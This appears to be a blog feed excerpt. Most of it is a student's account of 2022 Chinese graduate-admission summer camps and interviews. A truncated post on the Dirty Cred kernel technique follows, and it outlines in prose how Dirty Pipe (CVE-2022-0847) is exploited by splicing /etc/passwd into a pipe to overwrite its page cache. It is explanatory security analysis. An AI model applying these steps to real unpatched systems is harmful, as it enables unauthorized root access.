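RUC School of Information (信院)</h4><h5 id="入营-2">Admission</h5><p>RUC's School of Information opened summer-camp registration earliest (deadline May 20), so it was flooded with applicants. Results were promised for mid-June, but mid-June passed with nothing, and the top item on the notice board was a notice titled <strong>王老吉奖学金推荐情况公示</strong> (Wanglaoji Scholarship recommendation announcement). So many members of the 绿群 group chat jokingly call the school "Wanglaoji".</p><p>I watched that notice's view count climb from 200 to the current 8k+; it has been hammered…</p><p><img src="/2022/11/baoyan-note/image-20220714161625917.png" alt="image-20220714161625917"></p><p>With so many applicants I had expected to be screened out, but I was admitted after all, a pleasant surprise. RUC evidently screens on the overall application rather than simply title + rank.</p><p>RUC is small but excellent. The campus is not large, but it sits in a prime location (Zhongguancun), so going there is a very good deal. (Its computer science has also been growing fast in recent years.)</p><h5 id="时间表-2">Schedule</h5><p>July 3, afternoon: technical interview.</p><p>RUC also has a written test, which a CSP score can substitute for. A written test also means a mock session, but since I used my CSP score I skipped both; otherwise they would have clashed with NJU's written test. A CSP score of 300 converted to fewer points this year than last, so I thought substituting was a loss, but this year's written test was apparently much harder than last year's, so I actually came out ahead.</p><h5 id="专业面试-2">Technical Interview</h5><p>RUC's assessment is covered by confidentiality rules, so I will not give details here, only my own experience. (RUC is very strict about keeping interview questions confidential; they stress it before the interview and again afterwards.)</p><p>This was my worst English interview: I stumbled, froze every few seconds, and then blurted out a few words. I was nervous and could not really answer. Because this part is relatively hard, it probably carries somewhat more weight (a guess).</p><p>The rest of the interview was uneventful and went smoothly; the professors do not give you a hard time. If you stop for half a second after answering, they move straight to the next question without pressing further, which is very comfortable.</p><h5 id="导师面">Advisor Call</h5><p>On the evening after the interview, the professor who had interviewed me phoned and we chatted briefly about related work (nice voice, and quite a big name). Because I had worked a lot with fuzzing as an undergraduate, he hoped I would come to RUC. He was also frank that an advisor has very limited influence on the interview outcome; it mostly depends on the candidate.</p><h5 id="结果-2">Result</h5><p><strong>Notes written right after the interview</strong>:</p><p>In one word: doomed! My English interview was probably too weak, and the competition was stiff. Information security was originally 2 out of 25, but the written test cut some, so only about 15 actually interviewed.</p><p>I just hope I am near the top of the waiting list so that I can move up. Judging from previous years, RUC information security goes down to about seventh on the waiting list.</p><p>RUC releases results quickly. Interviews are spread over three days, for direct PhD, academic master's, and professional master's respectively, and emails go out the day after each interview: on the day RUC interviews professional master's candidates, academic master's candidates receive their email (if any).</p><p><strong>Follow-up</strong>: wow, they actually named me an <strong>outstanding camper (优营)</strong>. I was really touched. Information security had 3 outstanding campers this year.</p><h4 id="c-北大软微">c. 
PKU 软微</h4><h5 id="入营-3">Admission</h5><p>This seems to be the first year PKU 软微 has run a summer camp; previously it had only a pre-recommendation round, so many people guessed that something big was afoot.</p><p>First you submit application materials. 软微 filters out those that do not qualify, then asks the remaining applicants to <strong>choose a paper and write reading notes on it</strong>, and experts screen again based on the notes. Only after passing all of this are you admitted to the camp. This year 212 people were admitted, and only half will be kept.</p><p>Papers are offered in five directions, and the direction of the paper you choose becomes your chosen direction. The five are:</p><ul><li>System software (ubiquitous operating systems, Internet-of-Data system software, etc.)</li><li>High-confidence software (software and system security, blockchain and privacy computing, etc.)</li><li>Domain-specific intelligent software (big-data machine learning, distributed intelligent operations, etc.)</li><li>Domain-specific intelligent software (multimodal knowledge computing, program analysis and comprehension, etc.)</li><li>Domain-specific intelligent software (intelligent computing and perception, etc.)</li></ul><p>I ruled out the last three. I originally wanted a paper from direction 2, but its list put me off: half were machine learning and the rest included blockchain and the like. So I ended up choosing a paper from direction 1, on combining taint analysis with a big-data engine for privacy protection.</p><p>The notes must be at least 1.5k characters, but many people who wrote 2k were not admitted; from my quick tally, those admitted had mostly written 4k or more (me included).</p><blockquote><p>I do not think this is rat-racing; 2k characters is simply too few to describe what a paper says.</p></blockquote><h5 id="时间表-3">Schedule</h5><ul><li>July 10, morning: camp opening</li><li>July 10, afternoon: research group meet-and-greet</li><li>July 11-12: interviews</li></ul><h5 id="开营">Camp Opening</h5><p>软微 used to be employment-oriented, and people went there mostly with jobs in mind: students are allowed out on internships, and many could intern for a year or two, which is very comfortable. 绿群 even circulates a magical document called the "软微 Bible" (《软微圣经》)…</p><p>But starting this year, everything changed. For recommended students, 软微 now recruits <strong>for research</strong>. In other words, this year's professional master's students are no longer <strong>ordinary engineering master's</strong> students but <strong>"frontier" engineering master's</strong> students: recruited as professional master's students to do research, yet with <strong>no publication requirement</strong>, which seems a little odd.</p><p>Half of the professors recruiting for 软微 this year come from PKU 信工, and many of their labs are in Yanyuan (PKU's main campus). So for direction 1 (the only one I know about), three years at 软微 = 1 year in Daxing + 1.5 years of research at Yanyuan + 0.5 years of internship.</p><p>The university provides no housing for research at Yanyuan (the main campus cannot even house its own students, let alone others…), so 软微 students who do research there must rent their own place. The department's 2.5k subsidy plus the lab's research stipend should cover rent near Yanyuan (around 3k+), so it is actually a pretty good deal; even PKU 信科 is out in remote Changping.</p><p>Very unusually, the dean of 软微 said there will be <strong>no pre-recommendation round</strong> this year; 软微 will put all admitted campers on the waiting list so that the quota does not go unfilled when people decline offers.</p><blockquote><p>This depends on the direction, though: professors in some directions said they would not keep a waiting list, and if the quota goes unfilled, so be it.</p><p>My guess is that they also have quota at 信科 and do not depend on these few 软微 slots, hence the confidence.</p></blockquote><h5 id="专业面试-3">Technical Interview</h5><p>For the interview you prepare a self-introduction slide deck to show the professors what you can do. Prof. j, who interviewed me, was very kind, and the interview was relaxed and pleasant overall.</p><p>The English interview really was a formality. The professor asked which other summer camps I had applied to; I said I applied to Fudan's but was rejected, and to Tsinghua's but was not even admitted to the camp (facepalm).</p><p>But the interviewers said my profile was too specialized (my undergraduate work was mainly software security, and I had found vulnerabilities), whereas direction 1 mainly does system software. Prof. j was keen to take me, but he <strong>used to</strong> work on security and no longer does, so he referred me to a direction 2 professor.</p><p>The direction 2 professor never called (advisors phone to make an offer and confirm whether the student will come). On the evening of the day after the interview, Prof. j phoned me assuming the direction 2 professor had already called; he had not, which was awkward (facepalm). I then emailed Prof. s in direction 2 on my own and asked a senior student to refer me, but heard nothing back. I figured 软微 was a lost cause.</p><h5 id="结果-3">Result</h5><p>The direction 2 professor never called, so it really was over… Watching rank 1 and rank 2 of the neighboring computer science major land pkucs 
and thusz respectively, I was truly envious.</p><p>The moment the outstanding-camper list came out I still wrote to Prof. j, hoping he would consider me if anyone later declined.</p><p>A pity I did not get pkuss as a safety option.</p><h5 id="题外话">Aside</h5><p>This year both PKU Computer Science and 深圳研究院 were "weak committee" (弱 com): if a professor wants you, you are in. Unfortunately I had heard somewhere that PKU CS was "strong committee", so I did not contact any advisor. A pity.</p><p>Although 软微 recruits for research this year, there are in practice some hands-off advisors; with them you can probably still go on internships as before.</p><h4 id="d-上交软院">d. SJTU Software (软院)</h4><h5 id="入营-4">Admission</h5><p>At SJTU 软院 I wanted to aim for the ipads lab, which is extremely strong in systems, arguably the strongest OS lab in China. Prof. x is academically excellent, kind, and handsome too (smirk). At the end of April I emailed him and received a standard reply.</p><p>What I did not expect was that he actually read my blog. Because it contains my notes on the uCore course (very detailed notes; probably nobody has more detailed uCore notes than mine), he forwarded my blog to one of uCore's authors, Prof. chyyuu of Tsinghua's Department of Computer Science, and then…</p><p><img src="/2022/11/baoyan-note/image-20220714165628686.png" alt="image-20220714165628686"></p><p>I was genuinely moved (sob). Later I had a phone chat with Prof. chyyuu about this, which gave me some confidence for the summer camps. I am very grateful to both professors.</p><h5 id="时间表-4">Schedule</h5><ul><li>July 9: rehearsal</li><li>July 11: camp opening in the morning, coding test in the afternoon</li><li>July 12, morning: talks</li><li>July 13: technical interview</li></ul><h5 id="开营-2">Camp Opening</h5><p>On the morning of the opening I was rushing to a study room to attend it when I had an accident on my e-scooter and hit someone (sob). I spent the morning taking the injured person to hospital for a check-up and missed the opening entirely. I later heard from 绿群 that ipads takes only about 5 to 7 recommended students, even though it enrolled these people in 2021:</p><p><img src="/2022/11/baoyan-note/image-20220714165910483.png" alt="image-20220714165910483"></p><p>Some of those came through the entrance exam, joint programs and so on, so recommended students really are few and the competition is fierce.</p><p>Moreover, a little over 100 people were admitted to the camp, and more than 50 initially applied to ipads, so you can imagine how fierce it was…</p><h5 id="机考">Coding Test</h5><p>SJTU 软院's coding test is famously distinctive: one very large simulation-style problem (the kind that takes three hours). This year's asked us to implement a machine-learning decision tree by hand, with no GUI involved, so it was slightly easier. My strategy was flawed, though: I wrote most of the code before testing any of it, ran out of time, and tested only half. I do not know how it will be scored.</p><p>Before the test, the school issues a VPN account plus the account and password for a remote virtual machine, and we set up the environment on it ourselves (IDE and so on). All coding during the test is done over a remote desktop connection in that environment, with screen recording running inside the remote desktop.</p><p>The remote machine had a Xeon-series CPU, 16 GB of RAM, and 80 GB of disk, which was adequate. I installed Visual Studio, VSCode, PyCharm and more, and copied over the C++ and Python documentation; in the end I only used VS and never touched the docs.</p><p>The remote environment did have problems, though:</p><ol><li>Sluggish disk. The disk is an HDD, so almost any activity pushes disk utilization to 100%, and even creating a folder can hang for a long time (intermittently). The first hello world build in VS took 10 s… It was fine afterwards: open VS in advance and wait for everything to load, and there are no major issues.</li><li>Network. Network fluctuations greatly affect how usable the remote environment is. I heard someone quit the test in anger because the remote desktop was lagging like a slideshow…</li></ol><p>The test was scheduled for 15:00, but because some students could not connect to the VPN, it was delayed until about 16:30. That afternoon's test clashed with my 软微 interview. I had planned to finish the 软微 interview and then join the SJTU test late, but by sheer coincidence the VPN 
outage meant that I finished the 软微 interview just in time for the SJTU test. Equally coincidentally, 软微 interviewed me last that day (unbelievable…).</p><p>The proctor of my online exam room had said the problems could only be released once everyone had joined. After the 软微 interview I urgently asked 绿群 members for their proctors' phone numbers, phoned around to find my exam room's meeting ID, and only then started the test. I was genuinely grateful.</p><p><strong>A coding test score below 60 disqualifies you from the subsequent interview</strong>.</p><h5 id="专业面试-4">Technical Interview</h5><p>As in previous years, the ipads interview has you read a paper and then answer questions on it. The flow is roughly: introduce yourself with slides, then questions on the paper, then the English interview.</p><p>The interviewers were very kind and easygoing, but the questions were <strong>really tricky</strong>…</p><p>I had assumed the paper questions would test familiarity with the paper, so I read it twice beforehand, learned every point, and nearly memorized the evaluation numbers. But the professors asked about <strong>open-ended research thinking</strong>: where do you think a certain check should be performed, in hardware or in software? The paper does something on a single CPU only; how would you make it run in parallel on multiple CPUs? I do not know what others were asked, but all my questions were open-ended like this.</p><p>I really could not answer; I was speechless. These are not questions you can answer off the cuff; they take time to reason through, but there was no way to pause and think, so I said whatever came to mind. I had basically thrown it away…</p><p>In the English part I was asked to introduce any one of my projects in English, so I picked the paper I had been part of and talked briefly about it.</p><p>The professors asked pointedly about my coding ability; I said that of the fuzzer's 20k lines of code I wrote about 12k.</p><p>Overall the interview was relaxed and pleasant. Time is capped strictly at 20 minutes, and the professors guide you when you are stuck. I can only blame myself for not being good enough (sob)… I console myself with having earned an ipads interview experience card.</p><h5 id="结果-4">Result</h5><p>Whatever the school, SJTU releases results at the end of August, unlike other universities, which release them within a week or even three days of the interview. Direct-PhD results come out earlier than master's results, before mid-August or so, and direct PhD seems easier to get (depending on the department).</p><p>It does not matter anyway: the interview went badly, so my rank is probably far down, and I had already stopped caring by the time it ended.</p><p>Also, slots at SJTU 软院 usually go first to students already interning in the group (my guess), so outside students are even less likely to get an academic master's slot.</p><p>Also: ride your e-scooter on the greenway. The compensation cost me dearly (sob).</p><blockquote><p>Sure enough, I was later emailed a sixth place on the waiting list, which is about as good as a rejection.</p></blockquote><h4 id="e-武大网安">e. WHU Cybersecurity (网安)</h4><h5 id="入营-5">Admission</h5><p>I applied to WHU 网安 casually. I felt I most likely would not end up here, but applied anyway for the interview practice.</p><h5 id="时间表-5">Schedule</h5><p>July 11, afternoon: camp opening (missed it because of the 软微 interview and the SJTU coding test)</p><p>July 12: technical interview (I was scheduled for the afternoon)</p><p>July 13, morning: closing</p><h5 id="面试">Interview</h5><p>The interview order was decided by drawing lots, livestreamed in a group video call. It went very quickly, and I landed in the afternoon.</p><p>Interviews are very short, about seven or eight minutes each. I was sixth in the afternoon, and my turn came about 35 minutes after interviews began… I was still setting up my equipment and only just made it.</p><p>The setup was the strangest of all: the proctoring feed used Tencent Meeting (fine), but the interview itself used QQ video, which was a bit bizarre (facepalm).</p><p>The questions centered on my third-author paper and my fuzzer; they seem to ask about papers and projects.</p><p>They also asked: <strong>do you have any awards?</strong> This really is my weak spot… My answer: I have not stood out in competitions and have only some university-level and provincial awards (facepalm).</p><h5 id="结果-5">Result</h5><p>Outstanding camper, but I declined: the USTC offer arrived before the final list came out, so I wanted to release the WHU offer quickly and leave the chance to those behind me.</p><h4 id="f-南大计算机">f. 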
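Nanjing University, Computer Science</h4><h5 id="时间表-6">Schedule</h5><p>7.4 afternoon: NJU mock interview</p><p>7.7 afternoon: NJU written test</p><p>7.13-7.14: subject interview</p><h5 id="笔试">Written test</h5><p>NJU seems to have run a mass camp this year with over a thousand applicants admitted, so the written test had to cut more than half of them. It was 81 questions in one hour (all multiple choice, both single-answer and multi-answer), and on multi-answer questions <strong>any extra, missing, or wrong option scores zero</strong>. The topics included data structures, predicting the output of code by tracing it, computer networks, operating systems, and some Linux questions. The coverage was broad and intricate, going beyond the 408 syllabus (the national unified computer science entrance exam) to oddities such as how a Java lambda expression is represented in bytecode.</p><p>The test discriminated well and eliminated more than half of the candidates (rumor has it that about 2,000 were cut to 200). It felt like a filter for students with solid fundamentals and good <strong>luck</strong> (facepalm).</p><h5 id="实验室面">Lab interview</h5><p>NJU asks applicants to sign up for lab interviews of their choice before the department interview, so I picked SecLab, the only lab working on vulnerability discovery.</p><p>Professor m of SecLab is very strong and has given academic talks at many universities (I was lucky enough to attend one during my internship at Tsinghua, and it was very interesting).</p><p>I did not meet Professor m during the lab interview, but the students who interviewed me were very nice, and one of the PhD students had even competed on the TV show Super Brain (最强大脑) (respect).</p><p>The lab interview went happily, and then the department assessment fell through, which left me speechless…</p><h5 id="专业面试-5">Subject interview</h5><p>I was lucky to pass the written test, but the interview was truly hardcore… I searched online and found almost no write-ups of NJU interviews. I was interviewed on the second day, and judging from what people in the applicants' chat group reported on the first day, NJU likes to ask about discrete mathematics and data structures. But I had spent those two days dealing with the aftermath of a traffic accident and had not prepared at all, so the interview was a straight failure… Misfortunes really never come singly (facepalm). I could only console myself with the saying <strong>“misfortune is what fortune leans on, and fortune is where misfortune hides”</strong>…</p><p>The interview went roughly like this:</p><ul><li><p>No questions about projects, experience, or research, and no self-introduction. Purely subject knowledge.</p></li><li><p>The first question after entering: describe, in <strong>English</strong>, what problem Kruskal's algorithm solves, how the algorithm proceeds, and what its cost is.</p><blockquote><p>Hardcore, isn't it? (facepalm) My answer was terrible.</p></blockquote></li><li><p>The remaining questions were in Chinese: first discrete mathematics, then data structures, and finally one operating systems question and one open question.</p><p>NJU interviews seem to put a lot of weight on discrete mathematics, so review it thoroughly. (That is where I got burned.)</p><p>The open question was what I mainly do outside of class. Me: I built a project, blah blah… I felt this answer was very poor and probably not what they were looking for.</p></li></ul><p>The NJU interview was my worst performance of all (even worse than the Renmin University one). Although I thoroughly bombed it, past write-ups suggest that so many admitted students turn NJU down that its waiting list gets exhausted, so there may still be a chance. I will wait and see.</p><h5 id="结果-6">Result</h5><p>Around 80th on the waiting list. I have given up hope entirely, having failed this badly…</p><p>It also seems that once you have joined the NJU summer camp you can no longer take part in its pre-recommendation round, which makes my chances look even slimmer…</p><p>I heard that in past years NJU went through its waiting list down to 80+, but the pre-recommendation waiting list is ranked together with the summer camp one, so my position will probably slip further back.</p><h4 id="g-中科大网安">g. 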
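USTC, School of Cyber Science and Technology</h4><h5 id="入营-6">Admission to the camp</h5><p>Everyone admitted to the camp gets a gift pack:</p><p><img src="/2022/11/baoyan-note/8995B3A7F4C274967CB4BB3DAFBDD6FA.jpg" alt="img"></p><h5 id="专业面试-6">Subject interview</h5><p>The interview has two rounds of 10 minutes per person each and requires a PPT presentation. Only one of the two rounds includes an English question-and-answer session; both rounds include the PPT presentation and answering a randomly drawn subject question.</p><h5 id="结果-7">Result</h5><p>Outstanding camper (优营). This status seems easy to get at USTC for students from 985 universities: in this first summer camp of the cyber security school, 100 of the 136 campers received it.</p><p>However, once you have it you <strong>still need to contact a supervisor right away</strong> and complete mutual selection before filling in the recommendation system; otherwise the status is void.</p><p>My personal advice is to contact supervisors <strong>after</strong> you have the outstanding camper status, because they may be more willing to talk to students who already hold it.</p><p>I had earlier contacted a supervisor working on applied cryptography. The supervisor was understanding and willing to hold a place for me until I had finished trying for Tsinghua and Peking University, so having to turn them down later was hard, and my conscience troubled me.</p><h4 id="h-中科院计算所">h. Institute of Computing Technology, CAS</h4><h5 id="入营-7">Admission to the camp</h5><p>One day at lunch I suddenly got a phone call from a professor at the Institute of Computing Technology of the Chinese Academy of Sciences (ICT, CAS), inviting me to a short chat that evening.</p><p>I was quite surprised to be admitted. Personally, though, I am not very interested in CAS institutes because the atmosphere is so heavily research-focused; I would rather go to a more diverse university and have a richer graduate life (laughs).</p><p>Slightly embarrassingly, I had completely forgotten which supervisor I had listed as my preference at ICT after filling in the form, and only remembered from the Tencent Meeting display name during the short one-on-one interview… (I later found out I was not the only one who had forgotten, laughs.)</p><h5 id="简短面试">Short interview</h5><p>Only after being added to the WeChat group did I learn that I was not the only interviewee; each person got about 10 minutes on average.</p><p>The prospective supervisor first asks for a self-introduction (they have no materials at all and have no idea what your strengths are), so prepare it well.</p><p>The supervisor then asked about my internship and research experience, for example what a given piece of work was about. These were all fairly easy questions.</p><p>Finally the supervisor asked, “Have you ever debugged the Linux source code?” I said yes, and that I had debugged the Dirty Pipe vulnerability disclosed in early 2022. The supervisor asked me to explain it, nodded repeatedly while I did, and commented at the end that the answer was quite clear.</p><p>Overall the short interview was brief and relaxed. However, the supervisor said they only had professional master's places and left it to me to decide whether to take part in their formal interview.</p><h5 id="结果-8">Result</h5><p>I bowed out after the short interview, because I still prefer to study at a <strong>university</strong>, and a professional master's degree does not quite meet my expectations.</p><h3 id="3-夏令营的一点总结与经验">3. 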
夏令营的一点总结与经验</h3><ul><li><p>在<strong>入营</strong>的时候，title 和 rank <strong>至关重要</strong>，尤其是对于那些筛人时暴力 title &amp; rank 筛的学校，这里点名复旦。之前在绿群里看到一个末流211 rk1 多篇论文 + 多个国奖的佬，没入复旦计算机。当时看到他的消息时感觉这个有点戏剧化…</p><p>虽然 title 是由高考成绩决定，已经无法改变，但是 rank 确实可以再挣扎挣扎，<strong>rank 会直接影响到你是否能够入营</strong>。</p></li><li><p>ACM 慎重。除非拿 ACM 金，否则最好不要放弃科研和 rank。ACM 确实也是有优势的，有些学校对 ACMer 非常的青睐，但个人认为在上面的投入不如其他方面的性价比高。不过 ACMer 确实会在导师面等获取额外的印象分，这个看个人情况。</p></li><li><p>rank 和 title 会对入营起到很大的影响，但是在面试和导师面中，rank 和 title 反而是最不重要的，重要的是 <strong>科研经历与产出 &gt; 项目经历 &gt;= 竞赛经历 &gt;= 大厂实习经历 &gt;&gt; rank</strong>。导师更看重你的科研能力而不是 rank。同时<strong>有些</strong>学校的院系面试都只是走个过场，真正决定你留不留的下来的还是看材料，因此这些东西还是非常重要的。纯 rank 选手必须在专业课上打下非常扎实的基础，否则科研比不过、项目没有、竞赛没有，那基本上就毫无亮点。如果想着以后保研，公司实习的事情就可以稍微放放，应该把更多的经历花在科研实习上。</p></li><li><p>如果想冲<strong>强组牛导</strong>，<strong>一定要提前去参与课题组实习</strong>，最少实习一学期起步。提前实习可以<strong>提早占坑提早内定</strong>，同时夏令营时也可以很舒服的通过。不要想着只用嘴皮子就能套几个牛导，人家早就有实习生直接进组实习了。</p><p>实习也是双方选择的一个过程，在实习的过程中导师可以确定是否要你，你也可以确定这个组的氛围如何，是不是自己想去的那样，和先前的想象是否存在点出入。</p><p>同理，报那种<strong>以实验室为单位进行考核</strong>的院校，没有提前联系导师会吃大亏，这种实验室会优先收实习生（例如上交 ipads）。收的人越少，在没提前联系导师的情况下就越进不去。</p></li><li><p><strong>鸽导师慎重</strong>，尤其是同领域内的导师。我在整个夏令营阶段套的导师不多，只有五位。但是这五位导师真就相互认识，有些甚至是很好的朋友，我联系的导师几乎每个都问过我一遍你为啥不冲一下清华…因此最好在和导师聊的时候，实诚一点，让导师知道你可能不来的想法，提前打好预防针，同时也让老师知道你的难处。</p><p>当然，这点仁者见仁智者见智，有些同学鸽导师真是一个比一个狠…对于自己的发展来说，也不能说是做的不对，只能说还是得根据自身情况和导师角度来考虑。同时也为自己的学弟学妹们考虑，<strong>最好别用本校下届学子的福禄来为自己的前途铺路</strong>。</p></li></ul><blockquote><p>总结：套磁<strong>进组实习</strong> <strong>&gt;&gt;</strong> 科研经历与产出 &gt; 项目经历 &gt;= 竞赛经历 &gt;= <strong>大厂</strong>实习经历。</p><p>事实上面试的时候还挺多导师问我关于腾讯实习的经历。</p></blockquote><h2 id="四、预推免">四、预推免</h2><p>预推免的处境会比夏令营更难！整体上来看，大部分学校（包括中九那些）预推免的 bar 都会提高，可能之前夏令营是 rank 5% 能进，那预推免就会到 3% 了。预推免招的大部分都是 waiting list，老师收的大部分还是夏令营的营员。不过好在有一门<strong>国三</strong>水奖在预推免之前出结果了，同时绩点又上去了 0.01，因此我的处境稍微好些。</p><p>预推免时目前有了人大信院学硕和中科大学硕（武大被我放掉了，预推免系统没填）。由于人大 seclab 老师做的方向和我也很贴切，同时人大地理位置非常优越（北京四环以内），因此除了清北以外，人大 offer 
对我来说应该算是最优解了，所以在预推免时就简单冲击其他华五学校的夏令营。这里稍微点一下华五学校的预推免情况：</p><ul><li><p>人大：信院没有预推免。</p></li><li><p>南大：参加了夏令营就不准再参加预推免，但是预推免系统还是要填的。</p></li><li><p>复旦：主要的名额都在预推免，不过那里的导师和我做的方向还是不太搭。</p></li><li><p>浙大CS网安：21年学硕只有25个，其中13个本校生，个人感觉竞争<strong>不是一般的激烈</strong>。</p></li><li><p>上交：预推免基本上是<strong>直博生</strong>以及<strong>面向本校</strong>的推免，外校硕士<strong>毫无机会</strong>。</p><p>上交直博只要提前联系导师就好，超级好进。</p></li><li><p>中科大：<s>网安貌似没有预推免了</s> 本来以为没开，结果还真再开一批。</p></li></ul><p>清深（清华深圳研究院）和北深（北大信工）里面的老师，几乎全都是与大数据和人工智能相关，因此那边的老师对我的履历并不感兴趣（我做的东西和他们看中的完全不沾边），唯二和安全沾边的老师又上了研控网（懂得都懂）。在套不到导师的情况下，清深和北深在预推免基本上是没有机会的，因为大部分机会都在夏令营发放完了（我两个都没入营，笑），就算有鸽子也轮不到我候补。</p><p>北大系统一次性可以同时填报多个院系，但是北大每个院的 offer 也几乎完全在夏令营阶段发完了。预推免狂套 pkucs 导师，冲北大计算机主要是看能不能收留心碎被鸽导师（笑），不过看上去貌似是一点效果也没有，想上北大的还是得<strong>极度重视</strong>夏令营阶段。</p><p>那么这样以来，我预推免要冲的院系只剩下几个可选项了：</p><ol><li>浙江大学CS网络空间安全学院</li><li>复旦大学计算机系</li><li>北大软微 or CS</li><li>清华大学网络科学与网络空间研究院，简称清华网研院。</li></ol><p>首先是浙大。浙大今年 bar 巨高，一片拒信。外校生入场的可能只有两位数，网安那边据我所了解只有大概 50 来号人入了（包括本校和外校）。我也被拒掉了，可能是因为背景一般般吧，因为我看到有一个同水平但是 title 比我好很多的同学入了。</p><p>其次是复旦。复旦今年开的比较晚，大体上感觉预推免入的和夏令营入的还是同一批人，夏令营能进的预推免就能进，夏令营进不了的预推免还是进不了。我拿到了梦校的 offer 就把它鸽了，没再参与后面的面试流程。</p><p>之后是北大。北大虽然软微和 CS 都开了预推免，但是实际上并不收人，老师们已经在夏令营中被瓜分的差不多了，预推免基本上就相当于在招 waiting list，没有导师接收的话等于没戏。</p><p>最后是，<strong>清华网研院</strong>。</p><p>清华网研院，是我花了最多心思的目标院校，同时那里也有着我最想跟着一起搞研究的牛导，这里是我的<strong>最终目标</strong>，前面的一切夏令营+预推免活动都是在<strong>找保底院校</strong>。我在去年12月份便联系了导师，之后从寒假开始下半个学期一直在远程实习，实习了有大半年之久。在实习期间，我写过代码、辅助撰写过论文、逆向驱动等等，做研究的生活还挺充实的；而且在实习的过程中也确实感觉到组内氛围相当不错，这也加大了我想进组研究的意愿。</p><p>这里不得不提一句夏令营，夏令营招收 50 位学生，可能是材料和背景上的不足，竟然没有入营。后来了解到这个夏令营主要招直博生，直硕生招的少，这让我的心稍微宽慰了一点。</p><p>预推免进复试的共 75 个学生，只比夏令营多了25个，其中一半本校一半外校。本校和本校竞争，外校和外校竞争，学院招生名额对半分。这次外校直博有12人，直硕生有25人。外校生硕士名额是10个，25 进 10 稍微还是有点压力。</p><p>网研院的机考和计算机系、深研院是同一套的，这三个院系同一时间考同一套题，因此机考题不会太简单。这次预推免的题目不怎么偏向算法，以至于我苦练洛谷三个月最后愣是一点没用…不过自己还是考的比较差劲，只拿到了送的几个得分点。机考完后一直觉得自己考的巨差无比，尤其是今年机考成绩从 10% 变成了 20%，占比增大，机考的重要性翻倍。但是后来了解到机考成绩比我想象的要好，感觉又充满了希望。</p><p>面试细节就不过多描述了，学院官网上公示了考核方式，分为综合面试 8 分钟和专业面试 12 分钟，感兴趣的可以去看看。需要注意的是，在投递 top2 
时，各类文书（例如个人陈述、PPT 等）一定要精雕细磨，因为老师<strong>真的会翻来覆去的看你的文书材料</strong>…我在面试时看到底下一群老师在翻来翻去的看个人陈述，感到有一丝丝的害怕，深怕哪里翻车了…</p><p>最后感谢各位一直在支持着我的老师同学以及学长学姐们：</p><p><img src="/2022/11/baoyan-note/image-20220919134202687.png" alt="image-20220919134202687"></p><h2 id="五、鸽子">五、鸽子</h2><p>这里提几句鸽子情况。</p><ol><li>上交 ipads 实验室。在清华网研院出结果（<strong>9月19日</strong>）以后发了个邮件询问了一下自己的替补排名，从原先的<strong>替补第六</strong>上升到<strong>替补第二</strong>，在<strong>9月25日</strong>收到了教务秘书的专硕递补电话。感觉上交鸽子也是很多的（虽然我也要鸽了，笑）。今年上交软院也有企业联培计划，工程硕士也是一年校内两年企业培养。</li><li>南大 928 直接鸽到候补 200 多（好像是），有志于南大的候补要求<strong>直接进行系统填报</strong>，在候补时<strong>优先候补这些填报系统的同学</strong>，而<strong>不是候补排名靠前但没填报系统的同学</strong>。在算上填报系统的候补同学后，如果招生名额还有空缺就会开始打电话。我候补80就在 928 那天被打了；室友貌似候补200名，928那天和南大招生办打了好几个电话，极限上岸（祝贺）。</li></ol>]]></content>
    
    
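    <summary type="html">&lt;h2 id=&quot;一、简介&quot;&gt;I. Introduction&lt;/h2&gt;
&lt;p&gt;This post records my experience applying for recommended (exam-exempt) graduate admission in autumn 2022.&lt;/p&gt;
&lt;p&gt;Out of respect for the confidentiality requirements of the schools involved, it was published some time after the recommended-admission application system had closed.&lt;/p&gt;</summary>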
    
    
    
    
  </entry>
  
  <entry>
    <title>A Brief Analysis of Dirty Cred, a New Linux Exploitation Technique</title>
    <link href="https://kiprey.github.io/2022/10/dirty-cred/"/>
    <id>https://kiprey.github.io/2022/10/dirty-cred/</id>
    <published>2022-10-05T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:39.985Z</updated>
    
    <content type="html"><![CDATA[<h2 id="一、简介">I. Introduction</h2><p>Linux Dirty Cred is a new <strong>exploitation technique</strong> inspired by the Dirty Pipe vulnerability. With the Dirty Cred workflow, some <strong>memory-corruption vulnerabilities</strong> in the <strong>Linux kernel</strong> can be turned into <strong>logic bugs</strong> during exploitation, which lets them <strong>bypass all current kernel mitigations</strong> (including CFI, control-flow integrity).</p><p>The core idea of Dirty Cred is to <strong>swap a low-privileged credential object for a high-privileged one</strong> in order to escalate privileges. The work has been accepted at CCS 2022 and Black Hat USA 2022, and it is a genuinely interesting idea.</p><span id="more"></span><h2 id="二、背景介绍">II. Background</h2><p>Some background helps before getting into Dirty Cred.</p><h3 id="1-Dirty-Pipe">1. Dirty Pipe</h3><p>Linux Dirty Pipe (CVE-2022-0847) is a Linux kernel privilege-escalation vulnerability disclosed in early 2022. I wrote an analysis of it in the first half of that year, <a href="https://kiprey.github.io/2022/04/dirty-pipe/">Linux Dirty Pipe CVE-2022-0847 Vulnerability Analysis - Kiprey’s Blog</a>, so I will not repeat the details here.</p><p>A brief summary of the root cause:</p><p>A pipe is built on a ring buffer whose entries each reference <strong>a physical page that holds the actual data</strong>. On a write to the pipe, if <strong>the flags of the entry at the head of the queue</strong> contain <strong>PIPE_BUF_FLAG_CAN_MERGE</strong>, the new data <strong>can be merged directly</strong> into that entry's page, so no new entry has to be created, which reduces memory usage.</p><p>Linux has a system call named <strong>splice</strong> that can append file data to a pipe directly. Under the hood it adds a reference to the file's <strong>page cache</strong> page to the head of the pipe's queue. Because a page-cache page may be used in many places, the pipe entry that references it <strong>must not carry</strong> <strong>PIPE_BUF_FLAG_CAN_MERGE</strong>; otherwise a later write to the pipe would be merged into the page-cache page and modify it by mistake.</p><p>The root cause of Dirty Pipe is <strong>an uninitialized flags field in pipe buffer entries</strong>. An attacker can first fill the pipe with write so that every entry in the ring is flagged <strong>PIPE_BUF_FLAG_CAN_MERGE</strong>, then read the data back to drain the pipe, and then use splice to load the page cache of any readable file (for example <code>/etc/passwd</code>) into the pipe. The <strong>flags of the reused entry are not reset</strong>, so the entry that now references the page cache still carries the stale <strong>PIPE_BUF_FLAG_CAN_MERGE</strong>. A subsequent write therefore <strong>pollutes</strong> file page cache that should never be modified, <strong>tampering</strong> with the in-memory contents of a privileged file (for example <code>/etc/passwd</code>) and leading to privilege escalation.</p><p>Interestingly, the whole exploit <strong>never has to deal with any mitigation</strong>. Dirty Pipe is a pure <strong>logic bug</strong>, and logic bugs of this kind bypass mitigations entirely. However, Dirty Pipe also <strong>depends heavily on what pipes can do</strong> (the ability to inject data into arbitrary files through a pipe). In other 